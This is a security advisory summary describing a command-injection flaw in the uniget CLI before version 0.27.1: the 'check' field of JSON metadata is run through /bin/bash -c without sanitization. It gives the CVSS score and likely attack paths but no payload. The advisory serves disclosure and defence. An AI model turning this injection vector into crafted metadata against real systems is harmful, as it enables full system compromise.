uniget is a universal tool installer that processes JSON metadata files. Prior to version 0.27.1, the tool command checks the value of the "check" field by invoking /bin/bash -c with the raw string from the metadata. Because this value is taken directly from untrusted JSON without any validation or sanitization, an attacker can craft a metadata file containing malicious shell commands. When users run common uniget operations such as describe, install, update, or inspect, the injected shell code is executed with the privileges of the uniget user, allowing complete compromise of the system.

The vulnerability affects the uniget command‑line interface distributed by uniget‑org. All releases older than 0.27.1 are affected. The product is referred to as uniget CLI by the vendor.

The CVSS base score of 7.8 indicates a strong likelihood of exploitation if the vulnerability is present. The EPSS score is not available, so the current exploitation probability cannot be quantified, and the flaw is not listed in the CISA KEV catalog. Attackers can likely exploit the flaw by providing malicious metadata, which may be delivered remotely if the metadata source is untrusted, or locally if an attacker can place a crafted file on the system. The attack path requires execution of uniget commands, so an attacker must be able to run uniget on the target system. Overall, the risk is high for systems that use untrusted metadata sources or run uniget without restricting its input.